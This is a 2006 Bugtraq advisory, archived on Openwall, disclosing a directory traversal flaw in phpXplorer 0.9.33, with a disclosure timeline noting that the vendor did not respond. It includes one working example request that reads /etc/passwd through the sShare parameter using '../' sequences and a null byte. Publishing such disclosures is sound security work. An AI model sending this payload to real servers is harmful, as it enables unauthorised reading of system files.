lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Mon, 16 Jan 2006 11:10:32 +0100 From: Oriol Torrent <oriol.torrent@...il.com> To: bugtraq@...urityfocus.com Subject: Directory traversal in phpXplorer ========================================================== Title: Directory traversal in phpXplorer Application: phpXplorer Vendor: http://www.phpxplorer.org Vulnerable Versions: 0.9.33 Bug: directory traversal Date: 16-January-2006 Author: Oriol Torrent Santiago < oriol.torrent.AT.gmail.com > References: http://www.arrelnet.com/advisories/adv20060116.html ========================================================== 1) Background ----------- phpXplorer is an open source file management system written in PHP. It enables you to work on a remote file system through a web browser. 2) Problem description -------------------- An attacker can read arbitrary files outside the web root by sending specially formed requests Ex: http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00&ref=1 3) Solution: ---------- No Patch available. 4) Timeline --------- 17/12/2005 Bug discovered 20/12/2005 Vendor receives detailed advisory. No response 04/01/2006 Second notification. No response 16/01/2006 Public Disclosure